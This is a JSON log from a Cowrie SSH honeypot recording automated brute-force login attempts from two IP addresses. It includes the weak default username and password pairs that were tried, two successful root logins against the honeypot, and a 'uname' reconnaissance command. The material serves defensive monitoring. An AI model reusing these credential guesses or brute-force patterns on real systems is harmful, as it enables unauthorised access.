{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:11.398229Z","src_ip":"212.227.125.160","session":"cfcfa0a8f452"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:45:11.399223Z","src_ip":"212.227.125.160","session":"cfcfa0a8f452"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"12345678","message":"login attempt [daemon/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:14.130232Z","src_ip":"212.227.125.160","session":"cfcfa0a8f452"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0f7726d485","protocol":"ssh","message":"New connection: 212.227.125.160:57762 (1.2.3.4:22) [session: cc0f7726d485]","sensor":"my-vps","timestamp":"2025-08-31T00:45:14.133434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:14.134310Z","src_ip":"212.227.125.160","session":"cc0f7726d485"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:14.209392Z","src_ip":"212.227.125.160","session":"cc0f7726d485"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:14.745676Z","src_ip":"212.227.125.160","session":"cc0f7726d485"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:15.686820Z","src_ip":"212.227.125.160","session":"cfcfa0a8f452"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:15.821158Z","src_ip":"212.227.125.160","session":"cc0f7726d485"}
{"eventid":"cowrie.session.closed","duration":12.807981014251709,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:23.257857Z","src_ip":"212.227.235.229","session":"1f7a66b7b59a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb54c3e5ac7","protocol":"ssh","message":"New connection: 212.227.125.160:42392 (1.2.3.4:22) [session: 9eb54c3e5ac7]","sensor":"my-vps","timestamp":"2025-08-31T00:45:24.450073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:24.483998Z","src_ip":"212.227.125.160","session":"9eb54c3e5ac7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:24.525602Z","src_ip":"212.227.125.160","session":"9eb54c3e5ac7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:24.828509Z","src_ip":"212.227.125.160","session":"9eb54c3e5ac7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:25.994592Z","src_ip":"212.227.125.160","session":"9eb54c3e5ac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36452,"dst_ip":"1.2.3.4","dst_port":22,"session":"47702e5806f1","protocol":"ssh","message":"New connection: 212.227.125.160:36452 (1.2.3.4:22) [session: 47702e5806f1]","sensor":"my-vps","timestamp":"2025-08-31T00:45:34.513751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:34.600094Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:34.600832Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:45:35.031966Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:45:35.316210Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:45:35.316889Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:35.392436Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:35.393492Z","src_ip":"212.227.125.160","session":"47702e5806f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36274,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0edc37c44ef","protocol":"ssh","message":"New connection: 212.227.125.160:36274 (1.2.3.4:22) [session: f0edc37c44ef]","sensor":"my-vps","timestamp":"2025-08-31T00:45:43.439642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:43.441273Z","src_ip":"212.227.125.160","session":"f0edc37c44ef"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:45:43.698158Z","src_ip":"212.227.125.160","session":"f0edc37c44ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34800,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba065295b7c8","protocol":"ssh","message":"New connection: 212.227.125.160:34800 (1.2.3.4:22) [session: ba065295b7c8]","sensor":"my-vps","timestamp":"2025-08-31T00:45:44.693509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:44.712412Z","src_ip":"212.227.125.160","session":"ba065295b7c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:44.768202Z","src_ip":"212.227.125.160","session":"ba065295b7c8"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:45.253315Z","src_ip":"212.227.125.160","session":"ba065295b7c8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:46.329233Z","src_ip":"212.227.125.160","session":"ba065295b7c8"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:51.440523Z","src_ip":"212.227.125.160","session":"f0edc37c44ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47192,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2bf678c9fad","protocol":"ssh","message":"New connection: 212.227.235.229:47192 (1.2.3.4:22) [session: d2bf678c9fad]","sensor":"my-vps","timestamp":"2025-08-31T00:45:54.260141Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44986,"dst_ip":"1.2.3.4","dst_port":22,"session":"c19fb4db51ab","protocol":"ssh","message":"New connection: 212.227.125.160:44986 (1.2.3.4:22) [session: c19fb4db51ab]","sensor":"my-vps","timestamp":"2025-08-31T00:45:54.984438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:54.985379Z","src_ip":"212.227.125.160","session":"c19fb4db51ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:45:55.058805Z","src_ip":"212.227.125.160","session":"c19fb4db51ab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:45:55.253754Z","src_ip":"212.227.235.229","session":"d2bf678c9fad"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:45:55.254652Z","src_ip":"212.227.235.229","session":"d2bf678c9fad"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:45:55.281331Z","src_ip":"212.227.125.160","session":"c19fb4db51ab"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:45:56.367676Z","src_ip":"212.227.125.160","session":"c19fb4db51ab"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"123456789","message":"login attempt [daemon/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:01.299338Z","src_ip":"212.227.235.229","session":"d2bf678c9fad"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:03.178237Z","src_ip":"212.227.235.229","session":"d2bf678c9fad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48270,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa41bbea5b2a","protocol":"ssh","message":"New connection: 212.227.125.160:48270 (1.2.3.4:22) [session: fa41bbea5b2a]","sensor":"my-vps","timestamp":"2025-08-31T00:46:05.481670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:05.482632Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:05.556814Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:46:05.806736Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:46:06.125737Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:46:06.126432Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:06.201834Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:06.202897Z","src_ip":"212.227.125.160","session":"fa41bbea5b2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35994,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5e94cb6c23","protocol":"ssh","message":"New connection: 212.227.125.160:35994 (1.2.3.4:22) [session: 2d5e94cb6c23]","sensor":"my-vps","timestamp":"2025-08-31T00:46:15.858204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:15.858973Z","src_ip":"212.227.125.160","session":"2d5e94cb6c23"}
